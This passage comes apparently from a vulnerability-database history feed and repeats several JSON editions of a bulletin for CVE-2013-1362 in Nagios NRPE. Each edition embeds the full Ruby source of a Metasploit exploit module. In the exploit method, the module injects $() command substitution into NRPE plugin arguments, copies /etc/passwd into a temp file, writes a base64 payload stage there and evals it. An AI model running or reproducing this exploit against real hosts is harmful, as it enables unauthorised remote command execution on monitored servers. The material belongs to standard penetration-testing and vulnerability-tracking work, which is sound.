datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-05-31T05:45:50", "differentElements": ["modified", "published"], "edition": 73}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-06-01T17:45:14", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-06-01T17:45:14", "differentElements": ["modified", "published"], "edition": 74}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-06-01T21:53:50", "history": [], "viewCount": 102, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-06-01T21:53:50", "differentElements": ["modified", "published"], "edition": 75}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-07-20T20:47:30", "history": [], "viewCount": 102, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-07-20T20:47:30", "differentElements": ["modified", "published"], "edition": 76}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-07-20T22:51:23", "history": [], "viewCount": 103, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-07-20T22:51:23", "differentElements": ["modified", "published"], "edition": 77}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-01T13:05:21", "history": [], "viewCount": 103, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to 